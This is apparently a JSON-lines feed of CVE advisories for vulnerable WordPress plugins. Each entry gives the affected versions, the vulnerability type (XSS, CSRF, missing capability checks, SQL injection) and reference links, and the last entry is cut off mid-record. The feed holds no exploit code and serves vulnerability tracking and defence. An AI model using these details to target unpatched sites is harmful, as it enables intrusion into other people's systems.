{"CVE_ID":"CVE-2023-1868","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check when clearing the plugin cache via the yrc_clear_cache GET parameter in versions up to, and including, 1.2.3. This makes it possible for unauthenticated attackers to clear the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/541d202b-f3ed-44d8-93a6-e158209db885?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/541d202b-f3ed-44d8-93a6-e158209db885?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L768\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L768\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3053","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'azh_add_post' function in versions up to, and including, 1.27.133. This makes it possible for authenticated attackers to create a post with any post type and post status.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd56cb73-1c40-44b1-b713-c0291832d988?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd56cb73-1c40-44b1-b713-c0291832d988?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0368","slug":"responsive-tabs-for-wpbakery","versionImpact":"1.1","description":"The Responsive Tabs For WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b41e5c09-1034-48a7-ac0f-d4db6e7a3b3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b41e5c09-1034-48a7-ac0f-d4db6e7a3b3e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6733","slug":"wp-members","versionImpact":"3.4.8","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.8 via the wpmem_field shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including user emails, password hashes, usernames, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46c61f38-553e-43b2-a666-b160db40e66d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46c61f38-553e-43b2-a666-b160db40e66d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3015224%40wp-members%2Ftrunk&old=2920897%40wp-members%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3015224%40wp-members%2Ftrunk&old=2920897%40wp-members%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0907","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the restore_records() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to restore records.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0779","slug":"enjoy-instagram-instagram-responsive-images-gallery-and-carousel","versionImpact":"6.2.2","description":"The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ced134cf-82c5-401b-9476-b6456e1924e2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ced134cf-82c5-401b-9476-b6456e1924e2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3663","slug":"wp-scraper","versionImpact":"5.7","description":"The WP Scraper plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wp_scraper_multi_scrape_action() function in all versions up to, and including, 5.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a4bc52d-5771-4e7b-a394-772f2a5edbd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a4bc52d-5771-4e7b-a394-772f2a5edbd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scraper\\\/trunk\\\/wp-scraper.php#L1426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scraper\\\/trunk\\\/wp-scraper.php#L1426\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6669","slug":"chatbot","versionImpact":"5.5.7","description":"The AI ChatBot for WordPress \u2013 WPBot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce23efed-fe21-486a-ab3b-9ed0dd26a971?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce23efed-fe21-486a-ab3b-9ed0dd26a971?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chatbot\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chatbot\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L2211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L2211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119022\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8734","slug":"lucas-string-replace","versionImpact":"2.0.5","description":"The Lucas String Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lucas-string-replace\\\/trunk\\\/includes\\\/class-lucas-string-replace-settings.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lucas-string-replace\\\/trunk\\\/includes\\\/class-lucas-string-replace-settings.php#L176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8666","slug":"shoutcast-icecast-html5-radio-player","versionImpact":"2.1.6","description":"The Shoutcast Icecast HTML5 Radio Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'html5radio' shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e870ae2-abae-457a-b3d1-75a96ec09d41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e870ae2-abae-457a-b3d1-75a96ec09d41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shoutcast-icecast-html5-radio-player\\\/trunk\\\/shoutcast-icecast-html5-radio-player.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shoutcast-icecast-html5-radio-player\\\/trunk\\\/shoutcast-icecast-html5-radio-player.php#L379\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9386","slug":"exclusive-divi","versionImpact":"1.4","description":"The Exclusive Divi \u2013 Divi Preloader, Modules for Divi & Extra Theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bf68565-ea30-4caf-8323-b0b88561e89f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bf68565-ea30-4caf-8323-b0b88561e89f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-divi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-divi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-divi\\\/trunk\\\/public\\\/script-handler.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-divi\\\/trunk\\\/public\\\/script-handler.php#L62\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10832","slug":"posti-shipping","versionImpact":"3.10.3","description":"The Posti Shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.10.3. This is due to missing or incorrect nonce validation on the generate_notices_html() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posti-shipping\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posti-shipping\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11867","slug":"companion-portfolio","versionImpact":"2.4.0.1","description":"The Companion Portfolio \u2013 Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-portfolio\\\/tags\\\/2.4.0.1\\\/companion_portfolio.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-portfolio\\\/tags\\\/2.4.0.1\\\/companion_portfolio.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21df75e6-1f3e-4a08-a620-92b44fb48899?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21df75e6-1f3e-4a08-a620-92b44fb48899?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12124","slug":"role-includer","versionImpact":"1.6","description":"The Role Includer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018user_id\u2019 parameter in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/role-includer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/role-includer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97b3399b-cda2-4ab1-8919-b1e4ba4a5dcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97b3399b-cda2-4ab1-8919-b1e4ba4a5dcf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13184","slug":"wpextended","versionImpact":"3.0.12","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to time-based SQL Injection via the Login Attempts module in all versions up to, and including, 3.0.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_limit_login_attempts\\\/wpext_limit_login_attempts.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_limit_login_attempts\\\/wpext_limit_login_attempts.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220003\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220003\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abab29c7-88a9-4c6f-9691-ed9087cde2ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abab29c7-88a9-4c6f-9691-ed9087cde2ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13736","slug":"pure-chat","versionImpact":"2.31","description":"The Pure Chat \u2013 Live Chat & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018purechatWidgetName\u2019 parameter in all versions up to, and including, 2.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11993c1-48fa-4e37-850d-d02e3e20d56f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11993c1-48fa-4e37-850d-d02e3e20d56f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5285","slug":"product-subtitle-for-woocommerce","versionImpact":"1.3.9","description":"The Product Subtitle for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018htmlTag\u2019 parameter in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-subtitle-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/plugins\\\/class-pswc-guternburg-block.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-subtitle-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/plugins\\\/class-pswc-guternburg-block.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-subtitle-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-subtitle-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b276b1f7-e618-491f-beb4-675228632fa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b276b1f7-e618-491f-beb4-675228632fa0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8400","slug":"bee-quick-gallery","versionImpact":"1.0.0","description":"The Image Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bee-quick-gallery\\\/trunk\\\/includes\\\/bee-quick-gallery-functions.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bee-quick-gallery\\\/trunk\\\/includes\\\/bee-quick-gallery-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bee-quick-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bee-quick-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef52026b-1bfc-481c-8eb7-511d1910a35e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef52026b-1bfc-481c-8eb7-511d1910a35e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1867","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the save function. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c20db2d-f73d-4e52-a275-ab1975ae4b17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c20db2d-f73d-4e52-a275-ab1975ae4b17?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L426\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3052","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_add_post', 'azh_duplicate_post', 'azh_update_post' and 'azh_remove_post' functions. This makes it possible for unauthenticated attackers to create, modify, and delete a post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4159\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4174\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4e26035-ce4e-4b4b-aa3c-cd86b29b199a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4e26035-ce4e-4b4b-aa3c-cd86b29b199a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\